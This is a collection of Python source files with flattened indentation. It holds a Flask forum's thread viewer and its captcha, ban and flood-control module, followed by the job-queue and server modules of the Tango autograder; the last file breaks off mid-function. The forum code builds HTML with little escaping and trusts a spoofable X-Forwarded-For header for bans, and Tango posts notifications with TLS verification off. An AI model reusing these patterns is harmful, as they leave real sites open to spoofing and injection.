with open("templ/post.t", "r") as postt:
postt = postt.read()
with open("templ/newr.t", "r") as newr:
newr = newr.read()
with open("templ/thread.t", "r") as threadt:
threadt = threadt.read()
def hostlist(li=0):
hosts = [x.path.split("/")[2]for x
in os.scandir("./threads/") if x.is_dir()]
if li == 1:
return hosts
hosts2 = hosts
hosts.remove("local")
hosts.insert(0, "local")
hosts =[]
for x in hosts2:
hosts.append(f"\n<a href='/threads/{x}'>{x}</a>")
hosts.insert(0, "\n<a href='/threads/'>Global</a>")
hosts = "\n<b>Hosts:</b> " + " \n♦ ".join(hosts)
hosts = "<header style='text-align: right'>" + hosts + "\n</header>"
return hosts
def tlist(host=''):
linkf = "<td><a href='{0}'>{1}</a><td>{2}"
linkl = []
if not host:
all_index()
if host not in s.friends:
all_index()
# if host and host in s.friends:
with open(f"./threads/{host}/list.txt", "r") as toplist:
toplist = toplist.read().splitlines()
for t in toplist:
t = t.split(" ")
t[4] = " ".join(t[4:])
t[0] = f"/threads/{host}/{t[0]}/"
linkl.append(linkf.format(t[0], t[4], t[3]))
return linkl
def all_index():
linkf = "<td>{3} <td><a href='{0}'>{1}</a><td> {2} "
linkl = []
blist = hostlist(1)
toplist = []
for b in blist:
with open(f"./threads/{b}/list.txt", "r") as t:
t = t.read().splitlines()
toplist.append([" ".join([x, b]) for x in t])
toplist = [y for x in toplist for y in x]
toplist = [x.split(" ") for x in toplist]
toplist.sort(key=lambda x:x[1], reverse=1)
toplist = [" ".join(x) for x in toplist]
for t in toplist:
t = t.split(" ")
t[4] = " ".join(t[4:-1])
t[0] = f"/threads/{t[-1]}/{t[0]}/"
if t[-1] == "local":
pass
else:
t[-1] = f"{t[-1]}"
linkl.append(linkf.format(t[0], t[4], t[3], t[-1]))
return linkl
@viewer.route('/threads/')
def view_all():
tops = all_index()
tops[0] = f"<header><hr>({len(tops)} discussions) ♦ " \
+ "<a href='/create'>Add new</a></header>" \
+ "<h1>All Sites</h1><table>" \
+ "<tr><th>origin<th>title<th>replies" \
+ "<tr>" + tops[0]
page = p.mk(hostlist() + "<tr>".join(tops) + "</table>")
return page
@viewer.route('/threads/<host>/')
def view(host):
# tlist() takes host input
if host and host in s.friends:
url = s.friends[host]
tops = tlist(host)
tops[0] = f"<header>({len(tops)} discussions) ♦ " \
+ "<a href='/create'>Add new</a> ♦ " \
+ f"from <a href='{url}'>{url}</a></header>" \
+ f"<h1>{host}</h1><table>" \
+ "<tr><th>title<th>replies" \
+ "<tr>" + tops[0]
else:
tops = tlist()
tops[0] = "<h1>All Sites</h1><ol><li>" + tops[0]
if host == "sageru":
tops[0] = u.bees + tops[0]
tops[0] = hostlist() + tops[0]
return p.mk("<tr>".join(tops) + "</table>\n")
<EMAIL>('/threads/<host>/<thread>/')
def view_t(host, thread):
lock = 0
tpath = f"./threads/{host}/{thread}/"
if os.path.isfile(tpath+"lock"):
lock = 1
tinfo = {"title":"", "source":"", "tags":"", "messages":""}
# Get the list of thread replies and the thread title.
with open(tpath + "list.txt", "r") as tind:
thr = [t.split(" ") for t in tind.read().splitlines()]
with open(tpath + "head.txt", "r") as meta:
meta = meta.read().splitlines()
tlink = "<a href='/tags/{0}/'>#{0}</a>"
meta[1] = meta[1].split(" ")
meta[1] = " ".join([tlink.format(m) for m in meta[1]])
tinfo["tags"] = meta[1]
# meta[1] = "tags: " + meta[1]
# Load the replies.
hosts = set([t[0] for t in thr])
tdb = {}
for b in hosts:
bfn = tpath + b + ".txt"
with open(bfn, "r") as bfn:
bfn = bfn.read().splitlines()
for n, x in enumerate(bfn):
x = x.split("<>")
if s.ihost in x[2]:
try:
x[2] = u.imgur(x[2])
except:
continue
tdb[x[0]] = [b, *x, n]
threadp = []
pnum = 0
psub = 0
cnt = {friends[x]: 0 for x in hosts}
for p in sorted(tdb.keys()):
p = tdb[p]
p.append(p[0])
p[4], p[5] = p[5], p[4]
aname = friends[p[0]]
if p[0] == host:
pnum += 1
psub = 0
p[0] = f"<a id='{pnum}' href='#{pnum}' " \
+ f"onclick='quote(\"{pnum}\")'>#{str(pnum)}</a>"
else:
psub += 1
cnt[aname] += 1
p[0] = ",".join([str(pnum), str(psub)])
p[0] = f"<a id='{aname}/{cnt[aname]}' name='{p[0]}' href='#{aname}/{cnt[aname]}' " \
+ f"onclick='quote(\"{aname}/{cnt[aname]}\")'>#{p[0]}</a>"
if p[4] != "local":
p[4] = f"🌎 <a href='{friends[p[4]]}'>{p[4]}</a>"
else:
p[4] = ""
p[3] = p[3].split("<br>")
p[3] = "<br>".join([f"<b class='quote'>{x}</b>"
if len(x) and x[0] == ">" else x
for x in p[3]])
p[1] = u.unix2hum(p[1])
p[3] = p[3].replace("&", "&")
# Set up >>linking
fquote = {">>" + friends[f]: f for f in friends}
replies = []
for f in fquote:
if f in p[3]:
p[3] = p[3].split(f)
for n, x in enumerate(p[3]):
if "</" in x:
x = x.split("</")[0]
if " " in x:
x = x.split(" ")[0]
replies.append([f, x])
p[3] = f.join(p[3])
replies = ["".join(x) for x in replies]
for r in replies:
try:
if "https" in r:
r2 = ">>https://" + r.split("/")[2]
elif "http" in r:
r2 = ">>http://" + r.split("/")[2]
r2 = r.replace(r2, ">>" + fquote[r2])
except:
r2 = r
rep = "<a href='#" + r[2:] + "'>" \
+ r2 + "</a>"
p[3] = p[3].replace(r, rep)
if re.compile(r'>>[\d]').search(p[3]):
p[3] = re.sub(r'>>([\d\,]+)([\s]?)<',
r'<a href="#\1">>>\1</a><',
p[3])
p = postt.format(*p)
threadp.append(p)
tinfo["messages"] = "".join(threadp)
tinfo["title"] = meta[0]
if lock:
tinfo["title"] = "🔒 " + tinfo["title"]
# threadp.insert(0, f"<h1>{meta[0]}</h1>")
# threadp[0] += "source: "
if host != "local":
tinfo["source"] += "🌎"
tinfo["source"] += "<a href='/threads/{0}/'>{0}</a>".format(host)
thread = threadt.format(tinfo["title"], tinfo["source"], tinfo["tags"],
tinfo["messages"])
if host == "sageru":
thread = u.bees + thread
return thread
@viewer.route('/threads/<host>/<thread>/', methods=['POST', 'GET'])
def reply_t(host, thread):
now = str(int(time.time()))
if request.method == 'POST':
if request.form['sub'] == "Reply":
author = request.form["author"] or "Anonymous"
message = request.form["message"]
if not message:
return "please write a message"
if not whitelist.approve():
return "please solve <a href='/captcha'>the captcha</a>"
tpath = "/".join(["./threads", host, thread, "local.txt"])
flood = whitelist.flood(s.post)
if flood: return flood
writer.rep_t(host, thread, now, author, message)
writer.update_host(host, thread, now)
redir = f"/threads/{host}/{thread}"
return f"<center><h1><a href='{redir}'>View updated thread</a></h1></center>"
tpage = view_t(host, thread)
canpost = whitelist.approve()
lock = 0
if os.path.isfile(f"./threads/{host}/{thread}/lock"):
lock = 1
if not canpost:
replf = whitelist.show_captcha(1, f"/threads/{host}/{thread}/")
elif lock:
replf = "<hr> <div> 🔒 Thread has been locked. No more comments are allowed.</div>"
else:
replf = newr.format(host, thread)
tpage += replf
return p.mk(str(tpage))
```
#### File: 153/multichan/whitelist.py
```python
import json
import os
import random
import string
import time
import settings as s
import pagemaker as p
from captcha.image import ImageCaptcha
from flask import Blueprint
from flask import request
whitelist = Blueprint("whitelist", __name__)
image = ImageCaptcha(fonts=['droid.ttf'])
conf = s.wlist
klen = 5
tnow = int(time.time())
def get_ip():
return request.headers.get('X-Forwarded-For', request.remote_addr)
def randstr(length):
letters = "bcefgkmopswxz"
key = "".join(list(random.choice(letters) for i in range(length)))
return key
def ldlog():
with open(conf, "r") as log:
log = log.read().splitlines()
log = [i.split(" ") for i in log]
log = {i[1] : i for i in log}
return log
def genkey(ip):
entry = [str(int(time.time())), ip, str(randstr(klen))]
image.write(entry[2], f'./static/cap/{ip}.png')
return entry
def addlog(ip, ig=0):
log = ldlog()
if ip not in log or ig:
entry = genkey(ip)
log[ip] = entry
fi = "\n".join([" ".join(log[x]) for x in log])
with open(conf, "w") as iplog:
iplog.write(fi)
return log
def approve(ip=0, key=""):
if not ip:
ip = get_ip()
now = str(int(time.time()))
log = ldlog()
with open(s.bans, "r") as bans:
bans = bans.read().splitlines()
bans = [b.split(" ")[0] if " " else b for b in bans]
iprange = ".".join(ip.split(".")[:3])
if ip in bans or iprange in bans:
return False
if ip in log:
if len(log[ip]) == 3:
if log[ip][2] != key:
return False
log[ip].append(now)
newl = [" ".join(log[k]) for k in log]
with open(conf, "w") as log:
log.write("\n".join(newl))
return True
else:
return True
return False
@whitelist.route('/captcha/')
def show_captcha(hide=0, redir=''):
ip = get_ip()
mylog = addlog(ip)
logtxt = json.dumps(mylog)
out = ""
if not hide:
out = p.html("captcha")
out += p.html("captcha-form").format(mylog[ip][1], redir)
if hide:
return out
return p.mk(out)
@whitelist.route('/captcha/refresh')
def refresh():
ip = get_ip()
mylog = addlog(ip, 1)
return "<meta http-equiv='refresh' content='0;URL=/captcha'>"
@whitelist.route('/captcha/check', methods=['POST', 'GET'])
def check(redir=""):
key = request.args.get('key').lower()
ip = get_ip()
log = ldlog()
out = approve(ip, key)
out = json.dumps(out)
if out == "false":
out = "You have filled the captcha incorrectly."
out += "<p>Please <a href='/captcha'>solve the captcha.</a>"
if out == "true":
out = "You filled out the captcha correctly!"
out += "<p>Please <a href='/rules'>review the rules</a> before posting."
out += f"<hr><a href='{redir}'>back</a>"
if os.path.isfile(f"./static/cap/{ip}.png"):
os.remove(f"./static/cap/{ip}.png")
return out
def flood(limit=60, mode="comment"):
ip = get_ip()
tnow = str(int(time.time()))
with open(s.log, "r") as log:
log = log.read().splitlines()
try: log = [x.split() for x in log]
except: return False
log = [x for x in log if x[3] == ip]
if mode == "comment":
if not log: return False
try: post = log[-1][3:5]
except: return False
post[1] = post[1].split("<>")[0]
last = post
elif mode == "thread":
try: threads = [x for x in log if (x[0] == "local") and (x[2] == "1")]
except: return False
if not threads: return False
thread = threads[-1][3:5]
thread[1] = thread[1].split("<>")[0]
last = thread
pause = int(tnow) - int(last[1])
diff = limit - pause
if diff > 60:
diff = f"{diff//60} minutes {diff %60}"
if pause < limit:
return "<b>Error: flood detected.</b>" \
+ f"<p>Please wait {diff} seconds before trying to post again."
return False
``` |
{
"source": "15-411/Tango",
"score": 3
} |
#### File: 15-411/Tango/jobQueue.py
```python
import threading, logging, time
from datetime import datetime
from collections import defaultdict
from tangoObjects import TangoDictionary, TangoJob, TangoIntValue, WrappingDictionary
from config import Config
#
# JobQueue - This class defines the job queue and the functions for
# manipulating it. The actual queue is made up of two smaller
# sub-lists:
#
# - The active list is a dictionary, keyed off job ID, that holds all
# jobs that are active, including those not yet assigned to a worker
# thread. The trace attribute of a job being None indicates that
# the job is not yet assigned. Only the JobManager thread can
# assign jobs to Workers.
#
# - The dead list is a dictionary of the jobs that have completed.
#
class JobQueue:
def __init__(self, preallocator):
# Create two dictionaries that, for each job currently in the dictionary, also maintains a mapping
# from output file to the job. This allows easy, constant-time lookup for job based on output file.
self.liveJobs = WrappingDictionary("liveJobsWrapped", TangoDictionary("liveJobs"), lambda j: j.outputFile)
self.deadJobs = WrappingDictionary("deadJobsWrapped", TangoDictionary("deadJobs"), lambda j: j.outputFile)
self.queueLock = threading.Lock()
self.preallocator = preallocator
self.log = logging.getLogger("JobQueue")
self.nextID = 1
self.max_pool_size = TangoIntValue("max_pool_size", -1)
if (hasattr(Config, 'MAX_POOL_SIZE') and
Config.MAX_POOL_SIZE >= 0):
self.max_pool_size.set(Config.MAX_POOL_SIZE)
def _getNextID(self):
"""_getNextID - updates and returns the next ID to be used for a job
Jobs have ID's between 1 and MAX_JOBID.
"""
self.log.debug("_getNextID|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("_getNextID|Acquired lock to job queue.")
id = self.nextID
# If a job already exists in the queue at nextID, then try to find
# an empty ID. If the queue is full, then return -1.
keys = self.liveJobs.keys()
if (str(id) in keys):
id = -1
for i in xrange(1, Config.MAX_JOBID + 1):
if (str(i) not in keys):
id = i
break
self.nextID += 1
if self.nextID > Config.MAX_JOBID:
self.nextID = 1
self.log.debug("_getNextID|Released lock to job queue.")
return id
def add(self, job):
"""add - add job to live queue
This function assigns an ID number to a job and then adds it
to the queue of live jobs.
"""
if (not isinstance(job, TangoJob)):
return -1
self.log.debug("add|Getting next ID")
job.setId(self._getNextID())
if (job.id == -1):
self.log.info("add|JobQueue is full")
return -1
self.log.debug("add|Gotten next ID: " + str(job.id))
self.log.info("add|Unassigning job ID: %d" % (job.id))
job.makeUnassigned()
job.retries = 0
# Add the job to the queue. Careful not to append the trace until we
# know the job has actually been added to the queue.
self.log.debug("add|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("add| Acquired lock to job queue.")
self.liveJobs.set(job.id, job)
job.appendTrace("Added job %s:%d to queue" % (job.name, job.id))
self.log.debug("Ref: " + str(job._remoteLocation))
self.log.debug("job_id: " + str(job.id))
self.log.debug("job_name: " + str(job.name))
self.log.debug("add|Releasing lock to job queue.")
self.log.info("Added job %s:%d to queue, details = %s" %
(job.name, job.id, str(job.__dict__)))
return str(job.id)
def addDead(self, job):
""" addDead - add a job to the dead queue.
Called by validateJob when a job validation fails.
"""
if (not isinstance(job, TangoJob)):
return -1
job.setId(self._getNextID())
self.log.info("addDead|Unassigning job %s" % str(job.id))
job.makeUnassigned()
job.retries = 0
self.log.debug("addDead|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("addDead|Acquired lock to job queue.")
self.deadJobs.set(job.id, job)
self.log.debug("addDead|Released lock to job queue.")
return job.id
def remove(self, id):
"""remove - Remove job from live queue
"""
status = -1
self.log.debug("remove|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("remove|Acquired lock to job queue.")
if str(id) in self.liveJobs.keys():
self.liveJobs.delete(id)
status = 0
self.log.debug("remove|Relased lock to job queue.")
if status == 0:
self.log.debug("Removed job %s from queue" % id)
else:
self.log.error("Job %s not found in queue" % id)
return status
class JobStatus:
NOT_FOUND = 0
WAITING = 1
RUNNING = 2
DEAD = 3
def findRemovingWaiting(self, outputFile):
""" findRemovingWaiting - find the job with the given output file.
If the found job is live but unrun ("waiting"), move it from the live
queue to the dead queue. Always return the status of the found job.
"""
self.log.debug("findRemovingWaiting|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("findRemovingWaiting|Acquired lock to job queue.")
liveJobResult = self.liveJobs.getWrapped(outputFile)
deadJobResult = self.deadJobs.getWrapped(outputFile)
if liveJobResult:
(id, job) = liveJobResult
status = JobQueue.JobStatus.WAITING if job.isNotAssigned() else JobQueue.JobStatus.RUNNING
elif deadJobResult:
(id, job) = deadJobResult
status = JobQueue.JobStatus.DEAD
else:
(id, job) = (None, None)
status = JobQueue.JobStatus.NOT_FOUND
if status == JobQueue.JobStatus.WAITING:
self.makeDeadUnsafe(id, "Requested by findRemovingLabel")
self.log.debug("findRemovingWaiting|Relased lock to job queue.")
return id, job, status
def delJob(self, id, deadjob):
""" delJob - Implements delJob() interface call
@param id - The id of the job to remove
@param deadjob - If 0, move the job from the live queue to the
dead queue. If non-zero, remove the job from the dead queue
and discard.
"""
if deadjob == 0:
return self.makeDead(id, "Requested by operator")
else:
status = -1
self.log.debug("delJob| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("delJob| Acquired lock to job queue.")
if str(id) in self.deadJobs.keys():
self.deadJobs.delete(id)
status = 0
self.log.debug("delJob| Released lock to job queue.")
if status == 0:
self.log.debug("Removed job %s from dead queue" % id)
else:
self.log.error("Job %s not found in dead queue" % id)
return status
def isLive(self, id):
self.log.debug("isLive| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("isLive| Acquired lock to job queue.")
isLive = self.liveJobs.get(id)
self.log.debug("isLive| Released lock to job queue.")
return isLive
def get(self, id):
"""get - retrieve job from live queue
@param id - the id of the job to retrieve
"""
self.log.debug("get| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("get| Acquired lock to job queue.")
if str(id) in self.liveJobs.keys():
job = self.liveJobs.get(id)
else:
job = None
self.log.debug("get| Released lock to job queue.")
return job
def getNextPendingJob(self):
"""getNextPendingJob - Returns ID of next pending job from queue.
Called by JobManager when Config.REUSE_VMS==False
"""
with self.queueLock:
limitingKeys = defaultdict(int)
for id, job in self.liveJobs.iteritems():
if not job.isNotAssigned():
limitingKeys[job.limitingKey] += 1
max_concurrent = 0
if hasattr(Config, 'MAX_CONCURRENT_JOBS') and Config.MAX_CONCURRENT_JOBS:
max_concurrent = Config.MAX_CONCURRENT_JOBS
for id, job in self.liveJobs.iteritems():
if job.isNotAssigned() and (max_concurrent <= 0 or limitingKeys[job.limitingKey] < max_concurrent):
return id
return None
# Create or enlarge a pool if there is no free vm to use and
# the limit for pool is not reached yet
def incrementPoolSizeIfNecessary(self, job):
max_ps = self.max_pool_size.get()
if self.preallocator.freePoolSize(job.vm.name) == 0 and \
self.preallocator.poolSize(job.vm.name) < max_ps:
increment = 1
if hasattr(Config, 'POOL_ALLOC_INCREMENT') and Config.POOL_ALLOC_INCREMENT:
increment = Config.POOL_ALLOC_INCREMENT
self.preallocator.incrementPoolSize(job.vm, increment)
def getNextPendingJobReuse(self, target_id=None):
"""getNextPendingJobReuse - Returns ID of next pending job and its VM.
Called by JobManager when Config.REUSE_VMS==True
"""
self.log.debug("getNextPendingJobReuse| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("getNextPendingJobReuse| Acquired lock to job queue.")
limitingKeys = defaultdict(int)
for id, job in self.liveJobs.iteritems():
if not job.isNotAssigned():
limitingKeys[job.limitingKey] += 1
self.log.debug("getNextPendingJobReuse| Done checking limitingKeys")
max_concurrent = 0
if hasattr(Config, 'MAX_CONCURRENT_JOBS') and Config.MAX_CONCURRENT_JOBS:
max_concurrent = Config.MAX_CONCURRENT_JOBS
for id, job in self.liveJobs.iteritems():
# if target_id is set, only interested in this id
if target_id and target_id != id:
continue
# If the job hasn't been assigned to a worker yet, see if there
# is a free VM
if job.isNotAssigned() and (max_concurrent <= 0 or limitingKeys[job.limitingKey] < max_concurrent):
self.log.debug("getNextPendingJobReuse| Incrementing poolsize if necessary")
self.incrementPoolSizeIfNecessary(job)
self.log.debug("getNextPendingJobReuse| Done incrementing poolsize if necessary")
self.log.debug("getNextPendingJobReuse| Allocating vm")
vm = self.preallocator.allocVM(job.vm.name)
self.log.debug("getNextPendingJobReuse| Done allocating vm")
if vm:
self.log.info("getNextPendingJobReuse alloc vm %s to job %s" % (vm, id))
self.log.debug("getNextPendingJobReuse| Released lock to job queue.")
return (id, vm)
self.log.debug("getNextPendingJobReuse| Released lock to job queue.")
return (None, None)
# Returns the number of jobs that are ready to be assigned to a VM.
# NOTE: the client must manually obtain the queueLock before calling this.
def numReadyJobsUnsafe(self):
count = 0
max_concurrent = 0
if hasattr(Config, 'MAX_CONCURRENT_JOBS') and Config.MAX_CONCURRENT_JOBS:
max_concurrent = Config.MAX_CONCURRENT_JOBS
limitingKeys = defaultdict(int)
for id, job in self.liveJobs.iteritems():
if not job.isNotAssigned():
limitingKeys[job.limitingKey] += 1
for id, job in self.liveJobs.iteritems():
if job.isNotAssigned() and (max_concurrent <= 0 or limitingKeys[job.limitingKey] < max_concurrent):
count += 1
return count
def assignJob(self, jobId):
""" assignJob - marks a job to be assigned
"""
self.log.debug("assignJob| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("assignJob| Acquired lock to job queue.")
job = self.liveJobs.get(jobId)
self.log.debug("assignJob| Retrieved job.")
self.log.info("assignJob|Assigning job ID: %s" % str(job.id))
job.makeAssigned()
self.log.debug("assignJob| Released lock to job queue.")
def unassignJob(self, jobId):
""" assignJob - marks a job to be unassigned
"""
self.log.debug("unassignJob| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("unassignJob| Acquired lock to job queue.")
job = self.liveJobs.get(jobId)
if job.retries is None:
job.retries = 0
else:
job.retries += 1
Config.job_retries += 1
self.log.info("unassignJob|Unassigning job %s" % str(job.id))
job.makeUnassigned()
self.log.debug("unassignJob| Released lock to job queue.")
def makeDead(self, id, reason):
""" makeDead - move a job from live queue to dead queue
"""
self.log.info("makeDead| Making dead job ID: " + str(id) + " " + reason)
self.log.debug("makeDead| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("makeDead| Acquired lock to job queue.")
status = self.makeDeadUnsafe(id, reason)
self.log.debug("makeDead| Released lock to job queue.")
return status
# Thread unsafe version of makeDead that acquires no locks.
def makeDeadUnsafe(self, id, reason):
status = -1
if str(id) in self.liveJobs.keys():
self.log.info("makeDead| Found job ID: %d in the live queue" % (id))
status = 0
job = self.liveJobs.get(id)
self.log.info("Terminated job %s:%d: %s" %
(job.name, job.id, reason))
self.deadJobs.set(id, job)
self.liveJobs.delete(id)
job.appendTrace(reason)
return status
def getInfo(self):
info = {}
info['size'] = len(self.liveJobs.keys())
info['size_deadjobs'] = len(self.deadJobs.keys())
return info
def reset(self):
self.liveJobs._clean()
self.deadJobs._clean()
```
#### File: 15-411/Tango/tango.py
```python
import threading, logging, time, stat, re, os
from datetime import datetime
from preallocator import Preallocator
from jobQueue import JobQueue
from jobManager import JobManager
import requests
import threading
from tangoObjects import TangoJob
from config import Config
class CancellationStatus:
SUCCEEDED = 0
NOT_FOUND = 1
FAILED = 2
ALREADY_COMPLETED = 3
class TangoServer:
""" TangoServer - Implements the API functions that the server accepts
"""
def __init__(self):
self.daemon = True
# init logging early, or some logging will be lost
logging.basicConfig(
filename=Config.LOGFILE,
format="%(levelname)s|%(asctime)s|%(name)s|%(message)s",
level=Config.LOGLEVEL,
)
vmms = None
if Config.VMMS_NAME == "tashiSSH":
from vmms.tashiSSH import TashiSSH
vmms = TashiSSH()
elif Config.VMMS_NAME == "ec2SSH":
from vmms.ec2SSH import Ec2SSH
vmms = Ec2SSH()
elif Config.VMMS_NAME == "localDocker":
from vmms.localDocker import LocalDocker
vmms = LocalDocker()
elif Config.VMMS_NAME == "distDocker":
from vmms.distDocker import DistDocker
vmms = DistDocker()
self.preallocator = Preallocator({Config.VMMS_NAME: vmms})
self.jobQueue = JobQueue(self.preallocator)
if not Config.USE_REDIS:
# creates a local Job Manager if there is no persistent
# memory between processes. Otherwise, JobManager will
# be initiated separately
JobManager(self.jobQueue).start()
self.start_time = time.time()
self.log = logging.getLogger("TangoServer")
self.log.info("Starting Tango server")
def addJob(self, job):
""" addJob - Add a job to the job queue
"""
Config.job_requests += 1
self.log.debug("Received addJob request")
ret = self.__validateJob(job, self.preallocator.vmms)
self.log.info("Done validating job %s" % (job.name))
if ret == 0:
return self.jobQueue.add(job)
else:
self.jobQueue.addDead(job)
return -1
def delJob(self, id, deadjob):
""" delJob - Delete a job
@param id: Id of job to delete
@param deadjob - If 0, move the job from the live queue to the
dead queue. If non-zero, remove the job from the dead queue
and discard. Use with caution!
"""
self.log.debug("Received delJob(%d, %d) request" % (id, deadjob))
return self.jobQueue.delJob(id, deadjob)
def cancelJobWithPath(self, outFilePath):
""" cancelJobWithPath - when this function returns, one of the following
is true:
1. The job with the specified output file does not exist
2. the job with the specified output file has finished running normally
3. The job with the specified output file has been cancelled
4. The job was found, and it's running, but cancellation failed.
In case 1, NOT_FOUND is returned.
2, ALREADY_COMPLETED is returned.
3, SUCCEEDED is returned.
4, FAILED is returned.
"""
self.log.debug("Received cancelJobWithPath(%s) request" % (outFilePath))
id, job, job_status = self.jobQueue.findRemovingWaiting(outFilePath)
self.log.debug("cancelJobWithPath: Found a job %s with status %s" %
(job, job_status))
if job_status == JobQueue.JobStatus.NOT_FOUND:
return CancellationStatus.NOT_FOUND
elif job_status == JobQueue.JobStatus.DEAD:
return CancellationStatus.ALREADY_COMPLETED
elif job_status == JobQueue.JobStatus.RUNNING:
return self.killUntilJobComplete(id, job)
else:
assert job_status == JobQueue.JobStatus.WAITING
# In this case, findRemovingLive has moved the live job to the dead
# queue, and we have nothing to worry about.
# Let's notify autolab that the job is done.
if job.notifyURL:
outputFileName = job.outputFile.split("/")[-1] # get filename from path
files = {'file': unicode('Job was cancelled before it started.')}
hdrs = {'Filename': outputFileName}
self.log.debug("Sending request to %s" % job.notifyURL)
def worker():
requests.post(
job.notifyURL,
files=files,
headers=hdrs,
data = { 'runningTimeSeconds': 0 },
verify=False)
threading.Thread(target=worker).start()
return CancellationStatus.SUCCEEDED
def killUntilJobComplete(self, id, job):
""" Here's the contract:
If the job is currently running (i.e. it could complete at some point
in the future), then this method will return only when the job is
complete. It tries to help by repeatedly `pkill`ing the process. But
a compliant implementation could just block until the job completes
on its own.
On success, returns SUCCEEDED;
on failure, return FAILED (compliant w above method)
"""
self.log.debug("Received killUntilJobComplete request")
vm = job.vm
for _ in xrange(0, Config.CANCEL_RETRIES):
# Returns 0 on success.
if self.preallocator.vmms[vm.vmms].kill(vm) == 0:
return CancellationStatus.SUCCEEDED
return CancellationStatus.FAILED
def getJobs(self, item):
""" getJobs - Return the list of live jobs (item == 0) or the
list of dead jobs (item == -1).
^ You gotta be kidding me. Is this an API for number lovers.
"""
try:
self.log.debug("Received getJobs(%s) request" % (item))
if item == -1: # return the list of dead jobs
return self.jobQueue.deadJobs.values()
elif item == 0: # return the list of live jobs
return self.jobQueue.liveJobs.values()
else: # invalid parameter
return []
except Exception as e:
self.log.debug("getJobs: %s" % str(e))
def preallocVM(self, vm, num):
""" preallocVM - Set the pool size for VMs of type vm to num
"""
self.log.debug("Received preallocVM(%s,%d)request"
% (vm.name, num))
try:
vmms = self.preallocator.vmms[vm.vmms]
if not vm or num < 0:
return -2
if not vmms.isValidImage(vm.image):
self.log.error("Invalid image name")
return -3
(name, ext) = os.path.splitext(vm.image)
vm.name = name
self.preallocator.update(vm, num)
return 0
except Exception as err:
self.log.error("preallocVM failed: %s" % err)
return -1
def getVMs(self, vmms_name):
""" getVMs - return the list of VMs managed by the service vmms_name
"""
self.log.debug("Received getVMs request(%s)" % vmms_name)
try:
if vmms_name in self.preallocator.vmms:
vmms_inst = self.preallocator.vmms[vmms_name]
return vmms_inst.getVMs()
else:
return []
except Exception as err:
self.log.error("getVMs request failed: %s" % err)
return []
def delVM(self, vmName, id):
""" delVM - delete a specific VM instance from a pool
"""
self.log.debug("Received delVM request(%s, %d)" % (vmName, id))
try:
if not vmName or vmName == "" or not id:
return -1
return self.preallocator.destroyVM(vmName, id)
except Exception as err:
self.log.error("delVM request failed: %s" % err)
return -1
def getPool(self, vmName):
""" getPool - Return the current members of a pool and its free list
"""
self.log.debug("Received getPool request(%s)" % (vmName))
try:
if not vmName or vmName == "":
return []
result = self.preallocator.getPool(vmName)
return ["pool_size=%d" % len(result["pool"]),
"free_size=%d" % len(result["free"]),
"pool=%s" % result["pool"],
"free=%s" % result["free"]]
except Exception as err:
self.log.error("getPool request failed: %s" % err)
return []
def getInfo(self):
""" getInfo - return various statistics about the Tango daemon
"""
stats = {}
stats['elapsed_secs'] = time.time() - self.start_time;
stats['job_requests'] = Config.job_requests
stats['job_retries'] = Config.job_retries
stats['waitvm_timeouts'] = Config.waitvm_timeouts
stats['runjob_timeouts'] = Config.runjob_timeouts
stats['copyin_errors'] = Config.copyin_errors
stats['runjob_errors'] = Config.runjob_errors
stats['copyout_errors'] = Config.copyout_errors
stats['num_threads'] = threading.activeCount()
return stats
def setScaleParams(self, low_water_mark, max_pool_size):
self.preallocator.low_water_mark.set(low_water_mark)
self.jobQueue.max_pool_size.set(max_pool_size)
return 0
def runningTimeForOutputFile(self, outputFile):
self.log.debug("Received runningTimeForOutputFile(%s)" % outputFile)
liveJobTuple = self.jobQueue.liveJobs.getWrapped(outputFile)
if liveJobTuple:
(_, liveJob) = liveJobTuple
self.log.debug(str(liveJob.startTime))
return liveJob.runningTime()
return None
#
# Helper functions
#
# NOTE: This function should be called by ONLY jobManager. The rest servers
# shouldn't call this function.
def resetTango(self, vmms):
""" resetTango - resets Tango to a clean predictable state and
ensures that it has a working virtualization environment. A side
effect is that also checks that each supported VMMS is actually
running.
"""
# There are two cases this function is called: 1. Tango has a fresh start.
# Then we want to destroy all instances in Tango's name space. 2. Job
# Manager is restarted after a previous crash. Then we want to destroy
# the "busy" instances prior to the crash and leave the "free" onces intact.
self.log.debug("Received resetTango request.")
try:
# For each supported VMM system, get the instances it knows about
# in the current Tango name space and kill those not in free pools.
for vmms_name in vmms:
vobj = vmms[vmms_name]
# Round up all instances in the free pools.
allFreeVMs = []
for key in self.preallocator.machines.keys():
freePool = self.preallocator.getPool(key)["free"]
for vmId in freePool:
vmName = vobj.instanceName(vmId, key)
allFreeVMs.append(vmName)
self.log.info("vms in all free pools: %s" % allFreeVMs)
# For each in Tango's name space, destroy the onces in free pool.
# AND remove it from Tango's internal bookkeeping.
vms = vobj.getVMs()
self.log.debug("Pre-existing VMs: %s" % [vm.name for vm in vms])
destroyedList = []
removedList = []
for vm in vms:
if re.match("%s-" % Config.PREFIX, vm.name):
# Todo: should have an one-call interface to destroy the
# machine AND to keep the interval data consistent.
if vm.name not in allFreeVMs:
destroyedList.append(vm.name)
vobj.destroyVM(vm)
# also remove it from "total" set of the pool
(prefix, vmId, poolName) = vm.name.split("-")
machine = self.preallocator.machines.get(poolName)
if not machine: # the pool may not exist
continue
if int(vmId) in machine[0]:
removedList.append(vm.name)
machine[0].remove(int(vmId))
self.preallocator.machines.set(poolName, machine)
if destroyedList:
self.log.warning("Killed these %s VMs on restart: %s" %
(vmms_name, destroyedList))
if removedList:
self.log.warning("Removed these %s VMs from their pools" %
(removedList))
for _, job in self.jobQueue.liveJobs.iteritems():
if not job.isNotAssigned():
job.makeUnassigned()
self.log.debug("job: %s, assigned: %s" %
(str(job.name), str(job.assigned)))
except Exception as err:
self.log.error("resetTango: Call to VMMS %s failed: %s" %
(vmms_name, err))
os._exit(1)
def __validateJob(self, job, vmms):
""" validateJob - validate the input arguments in an addJob request.
"""
errors = 0
# If this isn't a Tango job then bail with an error
